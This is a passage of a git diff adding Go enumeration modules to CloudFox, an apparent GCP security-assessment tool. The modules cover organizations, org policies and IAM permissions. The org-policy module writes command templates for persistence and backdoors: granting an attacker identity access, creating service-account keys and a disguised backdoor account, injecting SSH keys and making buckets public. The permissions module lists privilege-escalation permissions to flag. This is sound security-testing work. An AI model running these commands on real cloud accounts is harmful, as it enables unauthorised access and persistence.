append(projectsBody, []string{ + proj.ProjectID, + m.GetProjectName(proj.ProjectID), + proj.DisplayName, + proj.Parent, + proj.State, + }) + } + + // Ancestry table + ancestryHeader := []string{ + "Project ID", + "Project Name", + "Ancestry Path", + } + + var ancestryBody [][]string + for _, ancestry := range m.Ancestry { + if len(ancestry) > 0 { + // Build ancestry path string with names + var path []string + projectID := "" + for _, node := range ancestry { + if node.Type == "project" { + projectID = node.ID + projName := m.GetProjectName(node.ID) + if projName != "" && projName != node.ID { + path = append(path, fmt.Sprintf("project:%s (%s)", projName, node.ID)) + } else { + path = append(path, fmt.Sprintf("project:%s", node.ID)) + } + } else if node.Type == "folder" { + folderName := m.getFolderName(node.ID) + if folderName != "" && folderName != node.ID { + path = append(path, fmt.Sprintf("folder:%s (%s)", folderName, node.ID)) + } else { + path = append(path, fmt.Sprintf("folder:%s", node.ID)) + } + } else if node.Type == "organization" { + orgName := m.getOrgName(node.ID) + if orgName != "" && orgName != node.ID { + path = append(path, fmt.Sprintf("organization:%s (%s)", orgName, node.ID)) + } else { + path = append(path, fmt.Sprintf("organization:%s", node.ID)) + } + } else { + path = append(path, fmt.Sprintf("%s:%s", node.Type, node.ID)) + } + } + ancestryBody = append(ancestryBody, []string{ + projectID, + m.GetProjectName(projectID), + strings.Join(path, " -> "), + }) + } + } + + // Build tables + var tables []internal.TableFile + + if len(orgsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "organizations", + Header: orgsHeader, + Body: orgsBody, + }) + } + + if len(foldersBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "org-folders", + Header: foldersHeader, + Body: foldersBody, + }) + } + + if len(projectsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "org-projects", + Header: projectsHeader, + Body: projectsBody, + }) + } + + if len(ancestryBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "org-ancestry", + Header: ancestryHeader, + Body: ancestryBody, + }) + } + + return tables +} + +func (m *OrganizationsModule) collectLootFiles() []internal.LootFile { + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + return lootFiles +} + +func (m *OrganizationsModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + // For organizations module, output at org level since it enumerates the whole hierarchy + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + tables := m.buildTables() + lootFiles := m.collectLootFiles() + + output := OrganizationsOutput{ + Table: tables, + Loot: lootFiles, + } + + // Determine output location - prefer org-level, fall back to project-level + orgID := "" + + // First, try to get org ID from the hierarchy + if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + orgID = m.Hierarchy.Organizations[0].ID + } else if len(m.Organizations) > 0 { + // Fall back to enumerated organizations if hierarchy not available + orgID = strings.TrimPrefix(m.Organizations[0].Name, "organizations/") + } + + // Ensure hierarchy has display names from our enumeration + // This handles the case where the hierarchy was built before we enumerated orgs + if m.Hierarchy != nil && len(m.Organizations) > 0 { + for _, org := range m.Organizations { + numericID := strings.TrimPrefix(org.Name, "organizations/") + // Update display name in hierarchy if we have a better one + for i := range m.Hierarchy.Organizations { + if m.Hierarchy.Organizations[i].ID == numericID { + if m.Hierarchy.Organizations[i].DisplayName == "" && org.DisplayName != "" { + m.Hierarchy.Organizations[i].DisplayName = org.DisplayName + } + break + } + } + } + } + + if orgID != "" { + // Place at org level + outputData.OrgLevelData[orgID] = output + } else if len(m.ProjectIDs) > 0 { + // Fall back to first project level if no org discovered + outputData.ProjectLevelData[m.ProjectIDs[0]] = output + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_ORGANIZATIONS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +func (m *OrganizationsModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + tables := m.buildTables() + lootFiles := m.collectLootFiles() + + output := OrganizationsOutput{ + Table: tables, + Loot: lootFiles, + } + + // Write output using HandleOutputSmart with scope support + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + scopeNames, // scopeNames + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_ORGANIZATIONS_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/orgpolicies.go b/gcp/commands/orgpolicies.go new file mode 100644 index 00000000..5c9275b2 --- /dev/null +++ b/gcp/commands/orgpolicies.go @@ -0,0 +1,417 @@ +package commands + +import ( + "github.com/BishopFox/cloudfox/gcp/shared" + "context" + "fmt" + "strings" + "sync" + + orgpolicyservice "github.com/BishopFox/cloudfox/gcp/services/orgpolicyService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPOrgPoliciesCommand = &cobra.Command{ + Use: globals.GCP_ORGPOLICIES_MODULE_NAME, + Aliases: []string{"orgpolicy", "policies"}, + Short: "Enumerate organization policies and identify security weaknesses", + Long: `Enumerate GCP organization policies to identify security configuration weaknesses. + +Organization policies control security constraints across GCP resources. This module +identifies policies that may be misconfigured or weakened, creating security risks. + +Security-Relevant Policies Analyzed: +- Domain restrictions (iam.allowedPolicyMemberDomains) +- Service account key controls (iam.disableServiceAccountKeyCreation) +- Workload identity restrictions +- Compute security (Shielded VM, OS Login, external IPs) +- Storage security (public access, uniform access) +- SQL security (public IPs, authorized networks) +- GKE security (public endpoints) +- Resource location restrictions + +Risk Indicators: +- AllowAll: Policy allows any value (HIGH risk) +- Wildcard patterns: Overly permissive allowed values +- Unenforced: Security constraint not enabled +- Override: Project overrides parent restrictions`, + Run: runGCPOrgPoliciesCommand, +} + +type OrgPoliciesModule struct { + gcpinternal.BaseGCPModule + ProjectPolicies map[string][]orgpolicyservice.OrgPolicyInfo // projectID -> policies + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex +} + +type OrgPoliciesOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o OrgPoliciesOutput) TableFiles() []internal.TableFile { return o.Table } +func (o OrgPoliciesOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPOrgPoliciesCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_ORGPOLICIES_MODULE_NAME) + if err != nil { + return + } + + module := &OrgPoliciesModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectPolicies: make(map[string][]orgpolicyservice.OrgPolicyInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *OrgPoliciesModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_ORGPOLICIES_MODULE_NAME, m.processProject) + + allPolicies := m.getAllPolicies() + if len(allPolicies) == 0 { + logger.InfoM("No organization policies found (may require orgpolicy.policies.list permission)", globals.GCP_ORGPOLICIES_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d organization policy(ies)", len(allPolicies)), globals.GCP_ORGPOLICIES_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *OrgPoliciesModule) getAllPolicies() []orgpolicyservice.OrgPolicyInfo { + var all []orgpolicyservice.OrgPolicyInfo + for _, policies := range m.ProjectPolicies { + all = append(all, policies...) + } + return all +} + +func (m *OrgPoliciesModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating org policies in project: %s", projectID), globals.GCP_ORGPOLICIES_MODULE_NAME) + } + + m.mu.Lock() + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["orgpolicies-commands"] = &internal.LootFile{ + Name: "orgpolicies-commands", + Contents: "# Organization Policy Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + m.mu.Unlock() + + svc := orgpolicyservice.New() + policies, err := svc.ListProjectPolicies(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_ORGPOLICIES_MODULE_NAME, + fmt.Sprintf("Could not enumerate org policies in project %s", projectID)) + return + } + + m.mu.Lock() + m.ProjectPolicies[projectID] = policies + for _, policy := range policies { + m.addPolicyToLoot(projectID, policy) + } + m.mu.Unlock() +} + +func (m *OrgPoliciesModule) addPolicyToLoot(projectID string, policy orgpolicyservice.OrgPolicyInfo) { + lootFile := m.LootMap[projectID]["orgpolicies-commands"] + if lootFile == nil { + return + } + // Extract short constraint name for commands + constraintName := policy.Constraint + if strings.HasPrefix(constraintName, "constraints/") { + constraintName = strings.TrimPrefix(constraintName, "constraints/") + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# CONSTRAINT: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n", + policy.Constraint, + policy.ProjectID, + ) + + if policy.Description != "" { + lootFile.Contents += fmt.Sprintf("# Description: %s\n", policy.Description) + } + + lootFile.Contents += fmt.Sprintf( + "# Enforced: %s, AllowAll: %s, DenyAll: %s, Inherit: %s\n", + shared.BoolToYesNo(policy.Enforced), + shared.BoolToYesNo(policy.AllowAll), + shared.BoolToYesNo(policy.DenyAll), + shared.BoolToYesNo(policy.InheritParent), + ) + + if len(policy.AllowedValues) > 0 { + lootFile.Contents += fmt.Sprintf("# Allowed Values: %s\n", strings.Join(policy.AllowedValues, ", ")) + } + if len(policy.DeniedValues) > 0 { + lootFile.Contents += fmt.Sprintf("# Denied Values: %s\n", strings.Join(policy.DeniedValues, ", ")) + } + + lootFile.Contents += fmt.Sprintf( + "\n# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe this policy:\n"+ + "gcloud org-policies describe %s --project=%s\n\n"+ + "# Get effective policy (includes inheritance):\n"+ + "gcloud org-policies describe %s --project=%s --effective\n\n"+ + "# List all constraints for this project:\n"+ + "gcloud org-policies list --project=%s\n\n", + constraintName, policy.ProjectID, + constraintName, policy.ProjectID, + policy.ProjectID, + ) + + // Exploit/bypass commands based on specific constraint types + lootFile.Contents += "# === EXPLOIT / BYPASS COMMANDS ===\n\n" + + switch constraintName { + case "iam.allowedPolicyMemberDomains": + if policy.AllowAll { + lootFile.Contents += "# [FINDING] Domain restriction is DISABLED (AllowAll) - any external identity can be granted access\n" + lootFile.Contents += fmt.Sprintf( + "# Grant access to external identity:\n"+ + "gcloud projects add-iam-policy-binding %s --member=user:attacker@external.com --role=roles/viewer\n\n", + policy.ProjectID, + ) + } else if !policy.Enforced { + lootFile.Contents += "# [FINDING] Domain restriction is NOT ENFORCED\n\n" + } + + case "iam.disableServiceAccountKeyCreation": + if !policy.Enforced || policy.AllowAll { + lootFile.Contents += "# [FINDING] SA key creation is NOT restricted - create keys for persistence:\n" + lootFile.Contents += fmt.Sprintf( + "gcloud iam service-accounts keys create /tmp/sa-key.json --iam-account=SA_EMAIL@%s.iam.gserviceaccount.com\n\n", + policy.ProjectID, + ) + } else { + lootFile.Contents += "# SA key creation is restricted - try alternative persistence methods:\n" + + "# - Workload identity federation\n" + + "# - Service account impersonation chain\n\n" + } + + case "iam.disableServiceAccountCreation": + if !policy.Enforced || policy.AllowAll { + lootFile.Contents += "# [FINDING] SA creation is NOT restricted - create backdoor service accounts:\n" + lootFile.Contents += fmt.Sprintf( + "gcloud iam service-accounts create cloudfox-backdoor --display-name='System Service' --project=%s\n\n", + policy.ProjectID, + ) + } + + case "compute.requireShieldedVm": + if !policy.Enforced || policy.AllowAll { + lootFile.Contents += "# [FINDING] Shielded VM is NOT required - unshielded VMs can be created:\n" + + "# Boot integrity monitoring is not enforced\n\n" + } + + case "compute.requireOsLogin": + if !policy.Enforced || policy.AllowAll { + lootFile.Contents += "# [FINDING] OS Login is NOT required - SSH keys can be added to project/instance metadata:\n" + lootFile.Contents += fmt.Sprintf( + "# Add SSH key to project metadata:\n"+ + "gcloud compute project-info add-metadata --metadata=ssh-keys=\"attacker:ssh-rsa AAAA...\" --project=%s\n\n", + policy.ProjectID, + ) + } + + case "compute.vmExternalIpAccess": + if policy.AllowAll { + lootFile.Contents += "# [FINDING] External IP access is NOT restricted - VMs can have public IPs:\n" + + "# Any VM can be assigned a public IP for data exfiltration\n\n" + } + + case "storage.uniformBucketLevelAccess": + if !policy.Enforced || policy.AllowAll { + lootFile.Contents += "# [FINDING] Uniform bucket access is NOT enforced - ACLs can be used:\n" + + "# Fine-grained ACLs allow per-object permissions that are harder to audit\n\n" + } + + case "storage.publicAccessPrevention": + if !policy.Enforced || policy.AllowAll { + lootFile.Contents += "# [FINDING] Public access prevention is NOT enforced:\n" + lootFile.Contents += fmt.Sprintf( + "# Make a bucket publicly accessible:\n"+ + "gsutil iam ch allUsers:objectViewer gs://BUCKET_NAME\n"+ + "# Or set public ACL:\n"+ + "gsutil acl ch -u AllUsers:R gs://BUCKET_NAME/OBJECT\n\n", + ) + } + + case "sql.restrictPublicIp": + if !policy.Enforced || policy.AllowAll { + lootFile.Contents += "# [FINDING] Public IP restriction is NOT enforced on Cloud SQL:\n" + + "# SQL instances can be created with public IPs\n\n" + } + + case "sql.restrictAuthorizedNetworks": + if !policy.Enforced || policy.AllowAll { + lootFile.Contents += "# [FINDING] Authorized network restriction is NOT enforced:\n" + + "# 0.0.0.0/0 can be added to authorized networks\n\n" + } + + default: + if policy.AllowAll { + lootFile.Contents += fmt.Sprintf("# [FINDING] Policy %s has AllowAll - constraint is effectively disabled\n\n", constraintName) + } else if !policy.Enforced { + lootFile.Contents += fmt.Sprintf("# [FINDING] Policy %s is not enforced\n\n", constraintName) + } + } +} + +func (m *OrgPoliciesModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *OrgPoliciesModule) getHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Constraint", + "Description", + "Enforced", + "Allow All", + "Deny All", + "Inherit", + "Allowed Values", + "Denied Values", + } +} + +func (m *OrgPoliciesModule) policiesToTableBody(policies []orgpolicyservice.OrgPolicyInfo) [][]string { + var body [][]string + for _, policy := range policies { + description := policy.Description + if description == "" { + description = "-" + } + + allowedValues := "-" + if len(policy.AllowedValues) > 0 { + allowedValues = strings.Join(policy.AllowedValues, ", ") + } + + deniedValues := "-" + if len(policy.DeniedValues) > 0 { + deniedValues = strings.Join(policy.DeniedValues, ", ") + } + + body = append(body, []string{ + m.GetProjectName(policy.ProjectID), + policy.ProjectID, + policy.Constraint, + description, + shared.BoolToYesNo(policy.Enforced), + shared.BoolToYesNo(policy.AllowAll), + shared.BoolToYesNo(policy.DenyAll), + shared.BoolToYesNo(policy.InheritParent), + allowedValues, + deniedValues, + }) + } + return body +} + +func (m *OrgPoliciesModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + if policies, ok := m.ProjectPolicies[projectID]; ok && len(policies) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "orgpolicies", + Header: m.getHeader(), + Body: m.policiesToTableBody(policies), + }) + } + return tableFiles +} + +func (m *OrgPoliciesModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID := range m.ProjectPolicies { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = OrgPoliciesOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_ORGPOLICIES_MODULE_NAME) + } +} + +func (m *OrgPoliciesModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allPolicies := m.getAllPolicies() + + var tables []internal.TableFile + if len(allPolicies) > 0 { + tables = append(tables, internal.TableFile{ + Name: "orgpolicies", + Header: m.getHeader(), + Body: m.policiesToTableBody(allPolicies), + }) + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := OrgPoliciesOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_ORGPOLICIES_MODULE_NAME) + } +} diff --git a/gcp/commands/permissions.go b/gcp/commands/permissions.go new file mode 100755 index 00000000..e40a14b5 --- /dev/null +++ b/gcp/commands/permissions.go @@ -0,0 +1,1359 @@ +package commands + +import ( + "context" + "fmt" + "sort" + "strings" + "sync" + + IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" + orgsservice "github.com/BishopFox/cloudfox/gcp/services/organizationsService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPPermissionsCommand = &cobra.Command{ + Use: globals.GCP_PERMISSIONS_MODULE_NAME, + Aliases: []string{"perms", "privs"}, + Short: "Enumerate ALL permissions for each IAM entity with full inheritance explosion", + Long: `Enumerate ALL permissions for each IAM entity with complete inheritance explosion. + +This module provides COMPLETE permission visibility by: +- Enumerating organization-level IAM bindings (top of hierarchy) +- Enumerating folder-level IAM bindings (inherited to child resources) +- Enumerating project-level IAM bindings (resource-specific) +- EXPLODING every role into its individual permissions (one line per permission) +- Tracking the exact inheritance source for each permission +- Expanding group memberships to show inherited permissions +- Identifying cross-project access patterns +- Flagging dangerous/privesc permissions + +Output: Single unified table with one row per permission entry.`, + Run: runGCPPermissionsCommand, +} + +// High-privilege permission prefixes that should be flagged +var highPrivilegePermissionPrefixes = []string{ + "iam.serviceAccounts.actAs", + "iam.serviceAccounts.getAccessToken", + "iam.serviceAccounts.getOpenIdToken", + "iam.serviceAccounts.implicitDelegation", + "iam.serviceAccounts.signBlob", + "iam.serviceAccounts.signJwt", + "iam.serviceAccountKeys.create", + "iam.roles.create", + "iam.roles.update", + "resourcemanager.projects.setIamPolicy", + "resourcemanager.folders.setIamPolicy", + "resourcemanager.organizations.setIamPolicy", + "compute.instances.setMetadata", + "compute.instances.setServiceAccount", + "compute.projects.setCommonInstanceMetadata", + "storage.buckets.setIamPolicy", + "storage.objects.setIamPolicy", + "cloudfunctions.functions.setIamPolicy", + "run.services.setIamPolicy", + "secretmanager.secrets.setIamPolicy", + "deploymentmanager.deployments.create", + "cloudbuild.builds.create", + "container.clusters.getCredentials", + "orgpolicy.policy.set", +} + +// ExplodedPermission represents a single permission entry with full context +type ExplodedPermission struct { + Entity string + EntityType string + EntityEmail string + Permission string + Role string + RoleType string + ResourceScope string + ResourceScopeType string + ResourceScopeID string + ResourceScopeName string + InheritedFrom string + IsInherited bool + HasCondition bool + Condition string + ConditionTitle string + EffectiveProject string + ProjectName string + IsCrossProject bool + SourceProject string + IsHighPrivilege bool +} + +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type PermissionsModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields - now per-project for hierarchical output + ProjectPerms map[string][]ExplodedPermission // projectID -> permissions + OrgPerms map[string][]ExplodedPermission // orgID -> org-level permissions + FolderPerms map[string][]ExplodedPermission // folderID -> folder-level permissions + EntityPermissions []IAMService.EntityPermissions // Legacy: aggregated for stats + GroupInfos []IAMService.GroupInfo // Legacy: aggregated for stats + OrgBindings []IAMService.PolicyBinding // org-level bindings + FolderBindings map[string][]IAMService.PolicyBinding // folder-level bindings + + // Per-scope loot files for inheritance-aware output + OrgLoot map[string]*internal.LootFile // orgID -> loot commands for org-level bindings + FolderLoot map[string]*internal.LootFile // folderID -> loot commands for folder-level bindings + ProjectLoot map[string]*internal.LootFile // projectID -> loot commands for project-level bindings + EnumLoot *internal.LootFile // permissions-enumeration loot file + + OrgCache *gcpinternal.OrgCache // OrgCache for hierarchy lookups + mu sync.Mutex + + // Organization info for output path + OrgIDs []string + OrgNames map[string]string +} + +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type PermissionsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o PermissionsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o PermissionsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPPermissionsCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_PERMISSIONS_MODULE_NAME) + if err != nil { + return + } + + module := &PermissionsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectPerms: make(map[string][]ExplodedPermission), + OrgPerms: make(map[string][]ExplodedPermission), + FolderPerms: make(map[string][]ExplodedPermission), + EntityPermissions: []IAMService.EntityPermissions{}, + GroupInfos: []IAMService.GroupInfo{}, + OrgBindings: []IAMService.PolicyBinding{}, + FolderBindings: make(map[string][]IAMService.PolicyBinding), + OrgLoot: make(map[string]*internal.LootFile), + FolderLoot: make(map[string]*internal.LootFile), + ProjectLoot: make(map[string]*internal.LootFile), + OrgIDs: []string{}, + OrgNames: make(map[string]string), + EnumLoot: &internal.LootFile{Name: "permissions-enumeration", Contents: ""}, + } + + // Initialize enumeration loot file + module.initializeEnumerationLoot() + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *PermissionsModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Enumerating ALL permissions with full inheritance explosion...", globals.GCP_PERMISSIONS_MODULE_NAME) + logger.InfoM("This includes organization, folder, and project-level bindings", globals.GCP_PERMISSIONS_MODULE_NAME) + + // Get OrgCache for hierarchy lookups (used for inheritance-aware routing) + m.OrgCache = gcpinternal.GetOrgCacheFromContext(ctx) + + // First, try to enumerate organization-level bindings + m.enumerateOrganizationBindings(ctx, logger) + + // Run project enumeration with concurrency + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_PERMISSIONS_MODULE_NAME, m.processProject) + + // Get all permissions for stats + allPerms := m.getAllExplodedPerms() + if len(allPerms) == 0 { + logger.InfoM("No permissions found", globals.GCP_PERMISSIONS_MODULE_NAME) + return + } + + // Count statistics + uniqueEntities := make(map[string]bool) + uniquePerms := make(map[string]bool) + inheritedCount := 0 + crossProjectCount := 0 + highPrivCount := 0 + + for _, ep := range allPerms { + uniqueEntities[ep.Entity] = true + uniquePerms[ep.Permission] = true + if ep.IsInherited { + inheritedCount++ + } + if ep.IsCrossProject { + crossProjectCount++ + } + if ep.IsHighPrivilege { + highPrivCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Exploded %d total permission entries for %d entities", + len(allPerms), len(uniqueEntities)), globals.GCP_PERMISSIONS_MODULE_NAME) + logger.InfoM(fmt.Sprintf("Unique permissions: %d | Inherited: %d | Cross-project: %d | High-privilege: %d", + len(uniquePerms), inheritedCount, crossProjectCount, highPrivCount), globals.GCP_PERMISSIONS_MODULE_NAME) + + if len(m.GroupInfos) > 0 { + groupsEnumerated := 0 + for _, gi := range m.GroupInfos { + if gi.MembershipEnumerated { + groupsEnumerated++ + } + } + logger.InfoM(fmt.Sprintf("Found %d group(s), enumerated membership for %d", len(m.GroupInfos), groupsEnumerated), globals.GCP_PERMISSIONS_MODULE_NAME) + + unenumeratedGroups := len(m.GroupInfos) - groupsEnumerated + if unenumeratedGroups > 0 { + logger.InfoM(fmt.Sprintf("[WARNING] Could not enumerate membership for %d group(s) - permissions inherited via these groups are NOT visible!", unenumeratedGroups), globals.GCP_PERMISSIONS_MODULE_NAME) + } + } + + // Generate enumeration loot after all projects are processed + m.generateEnumerationLoot() + + m.writeOutput(ctx, logger) +} + +// getAllExplodedPerms returns all permissions from all scopes (for statistics) +func (m *PermissionsModule) getAllExplodedPerms() []ExplodedPermission { + var all []ExplodedPermission + for _, perms := range m.OrgPerms { + all = append(all, perms...) + } + for _, perms := range m.FolderPerms { + all = append(all, perms...) + } + for _, perms := range m.ProjectPerms { + all = append(all, perms...) + } + return all +} + +// enumerateOrganizationBindings tries to get organization-level IAM bindings +func (m *PermissionsModule) enumerateOrganizationBindings(ctx context.Context, logger internal.Logger) { + orgsSvc := orgsservice.New() + + // Get org display names mapping (orgID -> displayName) + orgDisplayNames := make(map[string]string) + orgs, err := orgsSvc.SearchOrganizations() + if err == nil { + for _, org := range orgs { + // org.Name is "organizations/ORGID", extract just the ID + orgID := strings.TrimPrefix(org.Name, "organizations/") + orgDisplayNames[orgID] = org.DisplayName + } + } + + if len(m.ProjectIDs) > 0 { + iamSvc := IAMService.New() + + bindings, err := iamSvc.PoliciesWithInheritance(m.ProjectIDs[0]) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Could not get inherited policies: %v", err), globals.GCP_PERMISSIONS_MODULE_NAME) + } + return + } + + for _, binding := range bindings { + if binding.ResourceType == "organization" { + m.mu.Lock() + m.OrgBindings = append(m.OrgBindings, binding) + // Track org IDs + if !contains(m.OrgIDs, binding.ResourceID) { + m.OrgIDs = append(m.OrgIDs, binding.ResourceID) + // Use display name if available, otherwise fall back to ID + if displayName, ok := orgDisplayNames[binding.ResourceID]; ok && displayName != "" { + m.OrgNames[binding.ResourceID] = displayName + } else { + m.OrgNames[binding.ResourceID] = binding.ResourceID + } + } + m.mu.Unlock() + } else if binding.ResourceType == "folder" { + m.mu.Lock() + m.FolderBindings[binding.ResourceID] = append(m.FolderBindings[binding.ResourceID], binding) + m.mu.Unlock() + } + } + + if len(m.OrgBindings) > 0 { + logger.InfoM(fmt.Sprintf("Found %d organization-level IAM binding(s)", len(m.OrgBindings)), globals.GCP_PERMISSIONS_MODULE_NAME) + } + + totalFolderBindings := 0 + for _, bindings := range m.FolderBindings { + totalFolderBindings += len(bindings) + } + if totalFolderBindings > 0 { + logger.InfoM(fmt.Sprintf("Found %d folder-level IAM binding(s) across %d folder(s)", totalFolderBindings, len(m.FolderBindings)), globals.GCP_PERMISSIONS_MODULE_NAME) + } + } +} + +func contains(slice []string, item string) bool { + for _, s := range slice { + if s == item { + return true + } + } + return false +} + +// ------------------------------ +// Project Processor (called concurrently for each project) +// ------------------------------ +func (m *PermissionsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating permissions in project: %s", projectID), globals.GCP_PERMISSIONS_MODULE_NAME) + } + + iamService := IAMService.New() + entityPerms, groupInfos, err := iamService.GetAllEntityPermissionsWithGroupExpansion(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_PERMISSIONS_MODULE_NAME, + fmt.Sprintf("Could not enumerate permissions in project %s", projectID)) + return + } + + var projectPerms []ExplodedPermission + var orgPerms []ExplodedPermission + var folderPerms []ExplodedPermission + + for _, ep := range entityPerms { + for _, perm := range ep.Permissions { + isHighPriv := isHighPrivilegePermission(perm.Permission) + + exploded := ExplodedPermission{ + Entity: ep.Entity, + EntityType: ep.EntityType, + EntityEmail: ep.Email, + Permission: perm.Permission, + Role: perm.Role, + RoleType: perm.RoleType, + ResourceScope: fmt.Sprintf("%s/%s", perm.ResourceType, perm.ResourceID), + ResourceScopeType: perm.ResourceType, + ResourceScopeID: perm.ResourceID, + ResourceScopeName: m.getScopeName(perm.ResourceType, perm.ResourceID), + IsInherited: perm.IsInherited, + InheritedFrom: perm.InheritedFrom, + HasCondition: perm.HasCondition, + Condition: perm.Condition, + EffectiveProject: projectID, + ProjectName: m.GetProjectName(projectID), + IsHighPrivilege: isHighPriv, + } + + // Parse condition title if present + if perm.HasCondition && perm.Condition != "" { + exploded.ConditionTitle = parseConditionTitle(perm.Condition) + } + + // Detect cross-project access + if ep.EntityType == "ServiceAccount" { + saProject := extractProjectFromPrincipal(ep.Email, m.OrgCache) + if saProject != "" && saProject != projectID { + exploded.IsCrossProject = true + exploded.SourceProject = saProject + } + } + + // Route to appropriate scope: org, folder, 